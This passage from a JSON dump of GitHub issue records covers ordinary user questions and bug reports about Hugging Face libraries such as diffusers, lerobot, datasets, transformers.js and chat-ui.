output_type, return_dict, joint_attention_kwargs, clip_skip, callback_on_step_end, callback_on_step_end_tensor_inputs, max_sequence_length)\n   1023     width = latent_width * self.vae_scale_factor\n   1025 elif isinstance(self.controlnet, SD3MultiControlNetModel):\n-> 1026     raise NotImplementedError(\"MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline.\")\n   1027 else:\n   1028     assert False\n\nNotImplementedError: MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline.\n\n\nExpected Behavior\nI expect `StableDiffusion3ControlNetInpaintingPipeline` to support `SD3MultiControlNetModel`\n```\n\n### System Info\n\nVersions\n\nPython version: 3.10.16 (main, Dec 11 2024, 16:24:50) [GCC 11.2.0]\nPyTorch version: 2.2.0+cu118\nCUDA version: 11.8\nDiffusers version: 0.32.2\nTransformers version: 4.50.3\nAccelerate version: 1.7.0.dev0\n\n\n### Who can help?\n\n@yiyixuxu  @sayakpaul ",
    "url": "https://github.com/huggingface/diffusers/issues/11208",
    "state": "open",
    "labels": [
      "bug",
      "help wanted",
      "Good Example PR",
      "contributions-welcome"
    ],
    "created_at": "2025-04-04T12:39:10Z",
    "updated_at": "2025-05-11T15:03:00Z",
    "comments": 5,
    "user": "DanilaAniva"
  },
  {
    "repo": "huggingface/sentence-transformers",
    "number": 3308,
    "title": "How to load locally saved transformer models into sentence transformer?",
    "body": "I\u2019ve made some modifications to the NVEMBEDV2 model architecture and saved the updated version locally using `model.save_pretrained()`. However, when I try to wrap the saved model in a SentenceTransformer, I encounter a `KeyError: 'NVEmbedConfig'`.\n\nI checked the documentation, and while loading pretrained models seems straightforward, I\u2019m unsure how to handle models with a custom configuration and type. Is there a guide on how to properly load and integrate a locally modified transformer model into SentenceTransformer? \n\nI'm attaching a simple notebook for reproducibility and also the error. Thanks!\n\n[issue.ipynb.txt](https://github.com/user-attachments/files/19589812/issue.ipynb.txt)\n[requirements.txt](https://github.com/user-attachments/files/19589811/requirements.txt)",
    "url": "https://github.com/huggingface/sentence-transformers/issues/3308",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-03T15:11:20Z",
    "updated_at": "2025-04-08T15:48:26Z",
    "user": "samehkhattab"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7497,
    "title": "How to convert videos to images?",
    "body": "### Feature request\n\nDoes someone know how to return the images from videos?\n\n### Motivation\n\nI am trying to use openpi(https://github.com/Physical-Intelligence/openpi) to finetune my Lerobot dataset(V2.0 and V2.1). I find that although the codedaset is v2.0, they are different. It seems like Lerobot V2.0 has two version, one is data include images infos and another one is separate to data and videos.\n\nDoes someone know how to return the images from videos?\n\n\n\n",
    "url": "https://github.com/huggingface/datasets/issues/7497",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-04-03T07:08:39Z",
    "updated_at": "2025-04-15T12:35:15Z",
    "user": "Loki-Lu"
  },
  {
    "repo": "huggingface/blog",
    "number": 2781,
    "title": "How to submit revised version of Arxiv paper (v2) to Daily Papers",
    "body": "I would like to submit a revised version (v2) of our arXiv paper to Daily Papers, but the original submission (v1) was uploaded too long ago, so it's not eligible through the regular submission form.\n\nHowever, this v2 version was recently accepted to CVPR 2025, and it is a completely different paper compared to v1, both in content and contributions. It is based on a completely new idea and contains significant updates and improvements over the original version.\n\nIs there any way we can submit this revised version (v2) to Daily Papers?",
    "url": "https://github.com/huggingface/blog/issues/2781",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-02T09:20:30Z",
    "updated_at": "2025-11-03T15:22:36Z",
    "user": "eveningglow"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 927,
    "title": "How to train a model for VLN?",
    "body": "### System Info\n\n```Shell\nTo control four legs dogs.\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nrt\n\n### Expected behavior\n\ntret",
    "url": "https://github.com/huggingface/lerobot/issues/927",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-01T13:26:20Z",
    "updated_at": "2025-04-01T15:50:04Z",
    "user": "lucasjinreal"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 391,
    "title": "[QUESTION] UNIT-3 not yet published ?",
    "body": "\"Image\"",
    "url": "https://github.com/huggingface/agents-course/issues/391",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-01T11:24:07Z",
    "updated_at": "2025-04-30T04:50:26Z",
    "user": "ynareshkalyan21"
  },
  {
    "repo": "huggingface/hub-docs",
    "number": 1664,
    "title": "Page: \"how to be registered as a provider\"?",
    "body": "",
    "url": "https://github.com/huggingface/hub-docs/issues/1664",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-01T10:55:01Z",
    "updated_at": "2025-04-03T13:03:26Z",
    "user": "hanouticelina"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 926,
    "title": "[Question] Deploy leRobot for a delta kinematic",
    "body": "Bonjour everyone, \nI'm currently working on the development of an **open source delta robot** via ROS. \nI'm wondering if any of you have a clue to help me integrate leRobot ACT algorithm to the custom kinematic of my delta. \n\nATM the inverse kinematic is managed by a marlin CNC firmware (on arudino mega), so we communicated via gcode, but considering moving to micro-ros to have direct angular control of the stepper motors and better ROS integration\n\n\n",
    "url": "https://github.com/huggingface/lerobot/issues/926",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-01T09:46:29Z",
    "updated_at": "2025-04-28T10:57:31Z",
    "user": "man0n0n0"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2220,
    "title": "optimum-cli diffusion policy model issue",
    "body": "### System Info\n\n```shell\nHi,\nTrying to export a diffusion policy model to onnx format. From the error message and printed list of model types, it looks like \u201cdiffusion\u201d model cannot be exported to onnx.\nIs there a way to get around this?\n\noptimum-cli export onnx --model lerobot/diffusion_pusht --task reinforcement-learning /onnx/\n\nTraceback (most recent call last):\nFile \"/optimum-cli\", line 8, in\nsys.exit(main())\nFile \"/python3.10/site-packages/optimum/commands/optimum_cli.py\", line 208, in main\nservice.run()\nFile \"/python3.10/site-packages/optimum/commands/export/onnx.py\", line 265, in run\nmain_export(\nFile \"/python3.10/site-packages/optimum/exporters/onnx/main.py\", line 272, in main_export\nconfig = AutoConfig.from_pretrained(\nFile \"/python3.10/site-packages/transformers/models/auto/configuration_auto.py\", line 1008, in from_pretrained\nraise ValueError(\nValueError: Unrecognized model in lerobot/diffusion_pusht. Should have a model_type key in its config.json, or contain one of the following strings in its name:\n\nModel type form config.json:\n\"type\": \"diffusion\"\n\nSupported Models:\nalbert, align, altclip, audio-spectrogram-transformer, autoformer, bark, bart, beit, bert, bert-generation, big_bird, bigbird_pegasus, biogpt, bit, blenderbot, blenderbot-small, blip, blip-2, bloom, bridgetower, bros, camembert, canine, chameleon, chinese_clip, chinese_clip_vision_model, clap, clip, clip_vision_model, clipseg, clvp, code_llama, codegen, cohere, conditional_detr, convbert, convnext, convnextv2, cpmant, ctrl, cvt, data2vec-audio, data2vec-text, data2vec-vision, dbrx, deberta, deberta-v2, decision_transformer, deformable_detr, deit, depth_anything, deta, detr, dinat, dinov2, distilbert, donut-swin, dpr, dpt, efficientformer, efficientnet, electra, encodec, encoder-decoder, ernie, ernie_m, esm, falcon, fastspeech2_conformer, flaubert, flava, fnet, focalnet, fsmt, funnel, fuyu, gemma, gemma2, git, glpn, gpt-sw3, gpt2, gpt_bigcode, gpt_neo, gpt_neox, gpt_neox_japanese, gptj, gptsan-japanese, graphormer, grounding-dino, groupvit, hiera, hubert, ibert, idefics, idefics2, imagegpt, informer, instructblip, instructblipvideo, jamba, jetmoe, jukebox, kosmos-2, layoutlm, layoutlmv2, layoutlmv3, led, levit, lilt, llama, llava, llava-next-video, llava_next, longformer, longt5, luke, lxmert, m2m_100, mamba, mamba2, marian, markuplm, mask2former, maskformer, maskformer-swin, mbart, mctct, mega, megatron-bert, mgp-str, mistral, mixtral, mobilebert, mobilenet_v1, mobilenet_v2, mobilevit, mobilevitv2, mpnet, mpt, mra, mt5, musicgen, musicgen_melody, mvp, nat, nemotron, nezha, nllb-moe, nougat, nystromformer, olmo, oneformer, open-llama, openai-gpt, opt, owlv2, owlvit, paligemma, patchtsmixer, patchtst, pegasus, pegasus_x, perceiver, persimmon, phi, phi3, pix2struct, plbart, poolformer, pop2piano, prophetnet, pvt, pvt_v2, qdqbert, qwen2, qwen2_moe, rag, realm, recurrent_gemma, reformer, regnet, rembert, resnet, retribert, roberta, roberta-prelayernorm, roc_bert, roformer, rt_detr, rt_detr_resnet, rwkv, sam, seamless_m4t, seamless_m4t_v2, segformer, seggpt, sew, sew-d, siglip, siglip_vision_model, speech-encoder-decoder, speech_to_text, speech_to_text_2, speecht5, splinter, squeezebert, stablelm, starcoder2, superpoint, swiftformer, swin, swin2sr, swinv2, switch_transformers, t5, table-transformer, tapas, time_series_transformer, timesformer, timm_backbone, trajectory_transformer, transfo-xl, trocr, tvlt, tvp, udop, umt5, unispeech, unispeech-sat, univnet, 
upernet, van, video_llava, videomae, vilt, vipllava, vision-encoder-decoder, vision-text-dual-encoder, visual_bert, vit, vit_hybrid, vit_mae, vit_msn, vitdet, vitmatte, vits, vivit, wav2vec2, wav2vec2-bert, wav2vec2-conformer, wavlm, whisper, xclip, xglm, xlm, xlm-prophetnet, xlm-roberta, xlm-roberta-xl, xlnet, xmod, yolos, yoso, zoedepth\n\nThanks\n\n\nTo reproduce\nDownload model from HF\nUse optimum-cli to export the model\n\nPlatform\nLinux\n\nOS Version\nUbuntu 22.04.4 LTS\n\nONNX Runtime Installation\nReleased Package\n\nONNX Runtime Version or Commit ID\n1.21.0\n\nONNX Runtime API\nPython\n\nArchitecture\nARM64\n\nExecution Provider\nCUDA\n\nExecution Provider Library Version\n12.4\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nTo reproduce\nDownload model from HF\nUse optimum-cli to export the model\n\n### Expected behavior\n\nonnx export to succeed ",
    "url": "https://github.com/huggingface/optimum/issues/2220",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-01T04:59:53Z",
    "updated_at": "2025-06-11T13:57:20Z",
    "comments": 1,
    "user": "kraza8"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 923,
    "title": "Cannot install Lerobot",
    "body": "I am getting an error when the installation is building the av wheel. It is not passing this part of the installation",
    "url": "https://github.com/huggingface/lerobot/issues/923",
    "state": "closed",
    "labels": [
      "documentation",
      "question",
      "dependencies"
    ],
    "created_at": "2025-03-31T18:26:16Z",
    "updated_at": "2025-07-03T01:32:17Z",
    "user": "Prasit7"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 564,
    "title": "How to evaluate pass@16 for aime 2024 benchmark?",
    "body": "",
    "url": "https://github.com/huggingface/open-r1/issues/564",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-31T09:27:02Z",
    "updated_at": "2025-03-31T09:27:02Z",
    "user": "Cppowboy"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11176,
    "title": "How to use attention_mask and encoder_attention_mask or apply prompts to specific areas in the image?",
    "body": "Hi, I'm aware of the attention_mask and encoder_attention_mask that exist in the forward function of the UNet2DConditionModel yet there are no examples on how to use this \n\nI would appreciate some help on that, thank you in advance\n@patrickvonplaten @Birch-san ",
    "url": "https://github.com/huggingface/diffusers/issues/11176",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-30T16:56:40Z",
    "updated_at": "2025-04-30T15:03:34Z",
    "user": "alexblattner"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 920,
    "title": "[Question] How to convert dataset locally",
    "body": "I've noticed that `convert_dataset_v20_to_v21.py` convert LeRobot dataset from v20 to v21 that've already been pushed to the hub. But is there a script to do with local dataset? ",
    "url": "https://github.com/huggingface/lerobot/issues/920",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-30T13:32:50Z",
    "updated_at": "2025-10-13T02:30:26Z",
    "user": "Frozenkiddo"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 919,
    "title": "[Question] Why does \"action\" exist?",
    "body": "I am a beginner and I am very confused about it. What I can understand is that during my entire operation, I sampled at fixed time intervals. It's like a signal being collected by a letter. I only have to observe and what does action mean? Many data sets in the project have data with the column title `action`. Moreover, according to the expression of the project, `action` means the goal of the movement. However, this goal never seems to match the results in the observation. It looks like the robot never moves to its target. I was completely confused.",
    "url": "https://github.com/huggingface/lerobot/issues/919",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-30T10:45:57Z",
    "updated_at": "2025-03-31T07:50:19Z",
    "user": "ipc-robot"
  },
  {
    "repo": "huggingface/trl",
    "number": 3179,
    "title": "How to resume from the last checkpoint?",
    "body": "I want to continue training from the last checkpoint. How should I do it? I set resume_from_checkpoint=True in the GRPOConfig, but based on the output, it seems to start training from the first step. Do I also need to change the model to the checkpoint path?",
    "url": "https://github.com/huggingface/trl/issues/3179",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-03-30T02:30:47Z",
    "updated_at": "2025-03-30T04:35:58Z",
    "user": "Tuziking"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11168,
    "title": "Sage Attention for diffuser library",
    "body": "**Is your feature request related to a problem? No\n\n**Describe the solution you'd like.**\nA clear and concise description of what you want to happen.\nIncorporate a way to add sage attention to the diffusers library: Flux pipeline, Wan pipeline, etc.\n\n**Describe alternatives you've considered.**\nNone\n\n**Additional context.**\nWhen I incorporated sage attention in the flux pipeline (text to image) I achieved a 16% speed advantage vs no sage attention.\nMy environment was the same save for including / excluding sage attention in my 4 image benchmark creation.\n\nHow to incorporate sage attention? We must consider that this only applies to the Transformer. With this in mind I did the following to the FluxPipeline. Obviously there must be a way to do this via a variable of sorts so that we may/may not run it:\n\nNeed some kind of indicator to decide whether to include or not! This must be done before the denoising step in the model pipeline.\n`        import torch.nn.functional as F\n        sage_function = False\n        try:\n            from sageattention import sageattn\n            self.transformer.scaled_dot_product_attention = F.scaled_dot_product_attention = sageattn\n            sage_function = True\n        except (ImportError):\n            pass\n\n        # 6. Denoising loop\n        with self.progress_bar(total=num_inference_steps) as progress_bar:\n            for i, t in enumerate(timesteps):\n                if self.interrupt:\n                    continue\n`\nAfter the denoising step we must remove sage attention else we get a VAE error due to Sage Attn wanting only torch.float16 or torch.bfloat16 dtypes which the VAE doesn't want:\n\n`        if output_type == \"latent\":\n            image = latents\n        else:\n            if sage_function:\n                self.transformer.scaled_dot_product_attention = F.scaled_dot_product_attention = torch._C._nn.scaled_dot_product_attention\n`\nHopefully this helps.\n",
    "url": "https://github.com/huggingface/diffusers/issues/11168",
    "state": "open",
    "labels": [
      "wip"
    ],
    "created_at": "2025-03-28T20:39:30Z",
    "updated_at": "2025-06-23T05:59:27Z",
    "comments": 12,
    "user": "ukaprch"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 381,
    "title": "[QUESTION]LLM or Agent?",
    "body": "In the tutorial, a lot of the contents mislead to a wrong conectp with LLM and Agents. \n```\nThe Stop and Parse Approach\nOne key method for implementing actions is the stop and parse approach. This method ensures that the agent\u2019s output is structured and predictable:\n\nGeneration in a Structured Format:\nThe agent outputs its intended action in a clear, predetermined format (JSON or code).\n\nHalting Further Generation:\nOnce the action is complete, the agent stops generating additional tokens. This prevents extra or erroneous output.\n\nParsing the Output:\nAn external parser reads the formatted action, determines which Tool to call, and extracts the required parameters.\n\nFor example, an agent needing to check the weather might output:\n```\n\nThe agent can output? or the author means the LLM?",
    "url": "https://github.com/huggingface/agents-course/issues/381",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-28T15:36:45Z",
    "updated_at": "2025-04-30T04:50:54Z",
    "user": "joshhu"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 912,
    "title": "[Question]When will MultiLeRobotDataset available?",
    "body": "Hello, the MultiLeRobotDataset is very useful for training on large amounts of data; without it, training complex tasks would be difficult. However, I noticed that after the Simplify configs(#550) commit on January 31st,  MultiLeRobotDataset have been marked as unavailable(raise NotImplementedError(\"The MultiLeRobotDataset isn't supported for now.\")). Could you please let me know approximately when this functionality will be restored, or why it has been made unavailable?\n",
    "url": "https://github.com/huggingface/lerobot/issues/912",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-28T09:16:06Z",
    "updated_at": "2025-10-22T02:30:53Z",
    "user": "Vacuame"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 380,
    "title": "[QUESTION] Question on using HuggingFace space",
    "body": "First, the **best way to get a response fast is to ask the community** in our Discord server: https://www.hf.co/join/discord\n\nHowever, if you prefer you can ask here, please **be specific**.\n\nI am on AI Agents course now.\nI have trouble in using HuggingFace space.\nI studied this course at company so I have to open a firewall.\nSo I opened these port(80, 443. 8080) refer to following guide\n(https://huggingface.co/docs/hub/en/spaces-overview)\nBut my edge window can not display anything.\nIs there anything I'm missing?\n\nThank you for opening this course.\n\n![Image](https://github.com/user-attachments/assets/abe3ae2e-d0f6-4552-bb7c-c285c3daa57e)\n\n",
    "url": "https://github.com/huggingface/agents-course/issues/380",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-28T08:28:23Z",
    "updated_at": "2025-04-30T04:47:14Z",
    "user": "kjh0303"
  },
  {
    "repo": "huggingface/Math-Verify",
    "number": 47,
    "title": "Question: How to configure `verify` for strict multi-part answer checking?",
    "body": "Hi Math-Verify Team,\n\nI'm currently using `math-verify` for evaluating LLM outputs, specifically for questions that might require multiple answers (e.g., \"Find all X...\").\n\nI've observed that the `verify` function in `grader.py`, which seems to use logic similar to `any(product(gold, target))`, can return `True` even if the prediction only contains a subset of the required answers.\n\n**Example Observation:**\n\nIn my setup:\n* Ground Truth: `\"1331 and 1728\"` (appears to parse into something like `[1331, 1728]`)\n* Prediction: `\"1728\"` (parses to `[1728]`)\n* Result: `verify` returns `True`.\n\nWhile this makes sense if checking for *any* overlap, it seems too lenient for \"find all\" type questions where an exact match of all required elements is needed. This can lead to inflated scores or misleading reward signals in my use case.\n\n**Question:**\n\nIs there an existing configuration option or a recommended way within `math-verify` (perhaps via specific `ExtractionConfig` settings or ground truth formatting) to enforce a stricter check? Specifically, I'd like to verify if the *set* of predicted answers exactly matches the *set* of ground truth answers (considering mathematical equivalence).\n\nOr is the current behavior the intended default, and handling stricter set-based validation would require custom logic outside `verify` or modifications to the library?\n\nAny clarification or guidance on the best practice for achieving strict multi-part answer verification with `math-verify` would be greatly appreciated!\n\nThanks!",
    "url": "https://github.com/huggingface/Math-Verify/issues/47",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-27T16:54:52Z",
    "updated_at": "2025-07-01T19:31:51Z",
    "user": "TweedBeetle"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1259,
    "title": "3.2.4 has wrong env check in transformers.web.js",
    "body": "### Question\n\n## Background\nI have developed a chrome extension which is followed by the [example](https://github.com/huggingface/transformers.js/tree/main/examples/extension). The example was used the package @xenova/transformers.\n\n## Motivation\nIt seems that multithreads is work now. [Issue](https://github.com/huggingface/transformers.js/issues/928) [Issue2](https://github.com/huggingface/transformers.js/issues/882)\n\n## Question\nI change the package from **@xenova/transformers@2.17.2** to **@huggingface/transformers@3.4.1**. It shows a error **TypeError: sharp__WEBPACK_IMPORTED_MODULE_4__ is not a function** which have no been shown before. Anyone can help?\n\n## Code (background.js)\n``` \n// import { pipeline, env } from '@xenova/transformers';\n// env.localModelPath = './';\n// env.allowRemoteModels = false;\n// env.backends.onnx.wasm.numThreads = 1;\n\nimport { env, pipeline } from '@huggingface/transformers';\nenv.localModelPath = './';\n\nclass ImagePipelineSingleton {\n    static task = 'image-classification';\n    static model = '/deepfake/';\n    static instance = null;\n\n    static async getInstance() {\n        try {\n            if (this.instance === null) {\n                this.instance = await pipeline(this.task, this.model);\n            }\n        } catch (error) {\n            console.error(\"Initialization error:\", error);\n        }\n        return this.instance;\n    }\n}\n\n...\ntry{\n    let model = await ImagePipelineSingleton.getInstance();\n    let classification = await model(url); \n}catch (error) {\n    console.error(\"image processing error:\", error); //error here\n}\n...\n```\n\n## Folder Structure\n- deepfake\n  - onnx\n    - model_quantized.onnx",
    "url": "https://github.com/huggingface/transformers.js/issues/1259",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-27T07:35:23Z",
    "updated_at": "2025-07-02T04:45:26Z",
    "user": "sanixa"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7480,
    "title": "HF_DATASETS_CACHE ignored?",
    "body": "### Describe the bug\n\nI'm struggling to get things to respect HF_DATASETS_CACHE.\n\nRationale: I'm on a system that uses NFS for homedir, so downloading to NFS is expensive, slow, and wastes valuable quota compared to local disk. Instead, it seems to rely mostly on HF_HUB_CACHE.\n\nCurrent version: 3.2.1dev. In the process of testing 3.4.0\n\n### Steps to reproduce the bug\n\n[Currently writing using datasets 3.2.1dev. Will follow up with 3.4.0 results]\n\ndump.py:\n```python\nfrom datasets import load_dataset\ndataset = load_dataset(\"HuggingFaceFW/fineweb\", name=\"sample-100BT\", split=\"train\")\n```\n\nRepro steps\n```bash\n# ensure no cache\n$ mv ~/.cache/huggingface ~/.cache/huggingface.bak\n\n$ export HF_DATASETS_CACHE=/tmp/roller/datasets\n$ rm -rf ${HF_DATASETS_CACHE}\n$ env | grep HF | grep -v TOKEN\nHF_DATASETS_CACHE=/tmp/roller/datasets\n\n$ python dump.py\n# (omitted for brevity)\n\n# (while downloading) \n$ du -hcs ~/.cache/huggingface/hub\n18G     hub\n18G     total\n\n# (after downloading)\n$ du -hcs ~/.cache/huggingface/hub\n```\n\nIt's a shame because datasets supports s3 (which I could really use right now) but hub does not.\n\n### Expected behavior\n\n* ~/.cache/huggingface/hub stays empty\n* /tmp/roller/datasets becomes full of stuff\n\n### Environment info\n\n[Currently writing using datasets 3.2.1dev. Will follow up with 3.4.0 results]",
    "url": "https://github.com/huggingface/datasets/issues/7480",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-26T17:19:34Z",
    "updated_at": "2025-10-23T15:59:18Z",
    "comments": 8,
    "user": "stephenroller"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1258,
    "title": "Tokenizer encode and decode get different token ids and text, missing word_ids",
    "body": "### Question\n\n```js\nimport { AutoTokenizer } from '@huggingface/transformers';\n\nconst tokenizer = await AutoTokenizer.from_pretrained('deepseek-ai/DeepSeek-R1')\n\nconsole.log(tokenizer.encode(\" e.g., \u2669\"))\nconsole.log(tokenizer.decode([105]))\nconsole.log(tokenizer.encode(\"\u2669\"))\n```\n\n```\n[ 312, 3588, 1042, 30717, 105 ]\n\ufffd\n[ 21315, 105 ]\n```\nhow do I encode the words, and loop it and return it as single token,\nbecause now \u2669 is returning 2 tokens and becoming confusing\n\nso is this a bug or something?\n\n\nI guess i need word_ids?",
    "url": "https://github.com/huggingface/transformers.js/issues/1258",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-26T10:44:12Z",
    "updated_at": "2025-03-31T20:18:45Z",
    "user": "liho00"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 905,
    "title": "Supporting selection of obs and action keys in dataset",
    "body": "Hi all, thanks a lot for the framework.\n\nCurrently, it seems the LeRobotDataset format requires users to have a fixed state/environment state/images or actions defined in their dataset. However, this means that for multiple similar applications, the user has to record different datasets with different state or action definitions.\n\nIs it possible to select certain keys from the state or actions similar to how we can do in robomimic?\n\nhttps://github.com/ARISE-Initiative/robomimic/blob/master/robomimic/config/default_templates/bc_transformer.json#L107-L113",
    "url": "https://github.com/huggingface/lerobot/issues/905",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-26T08:12:10Z",
    "updated_at": "2025-10-10T02:27:27Z",
    "user": "Mayankm96"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1772,
    "title": "USE_LOCAL_WEBSEARCH No results found for this search query",
    "body": "## Bug description\n\nWith `USE_LOCAL_WEBSEARCH=true`, Web Search always reports _No results found for this search query_.\n\n## Steps to reproduce\n\n- enable search\n- enter and submit question\n\n## Screenshots\n\n\"Image\"\n\n## Context\n\nI'm running chat-ui-db using podman on an M1 Macbook. I'm using LM Studio as the model provider.\n\n`podman run --rm --mount type=bind,source=\"$(pwd)/.env.local\",target=/app/.env.local -v chat-ui:/data -p 3000:3000 ghcr.io/huggingface/chat-ui-db`\n\n### Logs\n\n\n\n```\n{\"level\":50,\"time\":1742937489975,\"pid\":18,\"hostname\":\"bbd76a6649ad\",\"msg\":\"No results found for this search query\"}\n```\n\n### Specs\n\n- **OS**: macOS 15.3.1 (24D70)\n- **Browser**: Firefox 136.0.2 (aarch64)\n- **chat-ui commit**: ghcr.io/huggingface/chat-ui-db f679ed220b9b\n\n### Config\n\n_.env.local_\n```\nHF_TOKEN=hf_...\nMODELS=`[\n  {\n    \"name\": \"LM Studio\",\n    \"endpoints\": [{\n      \"type\" : \"openai\",\n      \"baseURL\": \"http://host.docker.internal:1234/v1\"\n    }],\n  },\n]`\nUSE_LOCAL_WEBSEARCH=true\nWEBSEARCH_JAVASCRIPT=true\n```",
    "url": "https://github.com/huggingface/chat-ui/issues/1772",
    "state": "open",
    "labels": [
      "bug",
      "help wanted",
      "websearch"
    ],
    "created_at": "2025-03-25T21:28:11Z",
    "updated_at": "2025-10-22T21:13:54Z",
    "comments": 6,
    "user": "brechtm"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1771,
    "title": "Client disconnects before response is received",
    "body": "## Bug description\n\n\nIf an answer takes several minutes to complete, the chat-ui client simply disconnects. This disconnection happens at 1 minute, but I'm unsure.\n\n## Steps to reproduce\n\nAsk your LLM a riddle but change it a little, so it becomes confused and wonders for a while.\n\nman and a goat are one one side of a river with a boat. How do they get across?\n\nNotice that the response is terminated during thinking/reasoning phase.\n\nThe LM Studio logs indicates that the client disconnects so it terminates the response at that point.\n\n## Screenshots\n\n\n## Context\n\n### Logs\n\n\nThis request is terminated as 1min in the browser.\n```\ncurl 'https://example.com/conversation/67e1af3d9becaf215b19d526' \\\n-X 'POST' \\\n-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywFDiAu9glkYBEPBf' \\\n-H 'Accept: */*' \\\n--data-binary $'------WebKitFormBoundarywFDiAu9glkYBEPBf\\r\\nContent-Disposition: form-data; name=\"data\"\\r\\n\\r\\n{\"id\":\"91f280d4-9852-4453-b941-582eb531e911\",\"is_retry\":true,\"is_continue\":false,\"web_search\":false,\"tools\":[]}\\r\\n------WebKitFormBoundarywFDiAu9glkYBEPBf--\\r\\n'\n```\n\n### Specs\n\n- **OS**: OS X\n- **Browser**: Orion\n- **chat-ui commit**: chat-ui-db image: `ghcr.io/huggingface/chat-ui-db@sha256:a69b02884d0de64bb60d8011828b0e4be778673cadfc5f783fe6df14fa737504`\n\n### Config\n\n\n\n## Notes\n\nHow do I configure these timeouts?",
    "url": "https://github.com/huggingface/chat-ui/issues/1771",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-25T19:14:54Z",
    "updated_at": "2025-06-14T13:46:28Z",
    "comments": 3,
    "user": "drewwells"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7477,
    "title": "What is the canonical way to compress a Dataset?",
    "body": "Given that Arrow is the preferred backend for a Dataset, what is a user supposed to do if they want concurrent reads, concurrent writes AND on-disk compression for a larger dataset?\n\nParquet would be the obvious answer except that there is no native support for writing sharded, parquet datasets concurrently [[1](https://github.com/huggingface/datasets/issues/7047)].\n\nAm I missing something?  \n\nAnd if so, why is this not the standard/default way that `Dataset`'s work as they do in Xarray, Ray Data, Composer, etc.?",
    "url": "https://github.com/huggingface/datasets/issues/7477",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-25T16:47:51Z",
    "updated_at": "2025-04-03T09:13:11Z",
    "user": "eric-czech"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 901,
    "title": "Any tutorial on how to make experiments on the SimXArm enviroment?",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/901",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-25T13:29:59Z",
    "updated_at": "2025-03-25T16:42:11Z",
    "user": "chenkang455"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1765,
    "title": "`truncate` parameter ignored for OpenAI chat_completions endpoint",
    "body": "## Bug description\n\nThe `truncate` parameter in the ChatUI configuration is not being applied when using the OpenAI chat_completions endpoint.\n\n## Root Cause\n\nThe issue arises because the chat_completions endpoint does not utilize the buildPrompt function where the `truncate` parameter is handled. The logic for truncation is solely within buildPrompt and is therefore bypassed entirely when processing chat_completions requests. This means there's no truncation mechanism applied to the chat history before it's sent to vllm-openai or OpenAI.\n\n#1654 ",
    "url": "https://github.com/huggingface/chat-ui/issues/1765",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-25T10:13:40Z",
    "updated_at": "2025-03-25T10:20:33Z",
    "comments": 0,
    "user": "calycekr"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 350,
    "title": "how to train wan using 8 GPUs",
    "body": "I notice that there is only 4 GPUs scripts, even though I modify the script for 8 GPU training, it gets some errors.",
    "url": "https://github.com/huggingface/finetrainers/issues/350",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-25T05:02:18Z",
    "updated_at": "2025-05-06T14:54:50Z",
    "user": "tanshuai0219"
  },
  {
    "repo": "huggingface/diffusers",
